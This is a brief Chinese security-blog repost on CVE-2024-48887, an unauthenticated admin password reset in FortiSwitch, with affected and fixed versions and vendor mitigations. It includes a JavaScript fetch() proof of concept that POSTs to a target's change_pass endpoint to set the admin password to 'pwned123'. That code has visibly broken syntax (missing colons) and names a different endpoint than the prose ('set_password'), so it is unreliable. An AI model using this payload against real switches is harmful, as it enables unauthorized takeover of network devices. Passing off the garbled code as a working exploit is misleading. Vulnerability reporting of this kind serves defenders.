Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

admin 2025年4月25日14:56:27评论6 views字数 580阅读1分56秒阅读模式
Fortinet FortiSwitch 任意密码重置 CVE-2024-48887
该漏洞源于通过 FortiSwitch Web 界面更改密码时缺乏适当的验证。攻击者可以向set_password终端发送特殊请求,无需登录或任何用户交互即可更改管理员密码。由于该漏洞复杂度较低,因此存在重大风险——几乎可以在任何暴露界面的环境中实施。
受影响的版本范围从FortiSwitch 6.4.0 到 7.6.0。该问题已在固件版本 6.4.15、7.0.11、7.2.9、7.4.5 和 7.6.1 中得到修复。对于无法及时应用更新的用户,Fortinet 建议采取临时缓解措施:禁用对管理界面的 HTTP 和 HTTPS 访问,并将设备访问限制为仅受信任的主机。
fetch('http://target-ip/change_pass', {method'POST',headers: { 'Content-Type''application/json' },body: JSON.stringify({username'admin',newpass'pwned123',confirm'pwned123'  })}).then(res => res.text()).then(data => console.log('Response:', data));

原文始发于微信公众号(Khan安全团队):Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月25日14:56:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fortinet FortiSwitch 任意密码重置 CVE-2024-48887https://cn-sec.com/archives/3999980.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息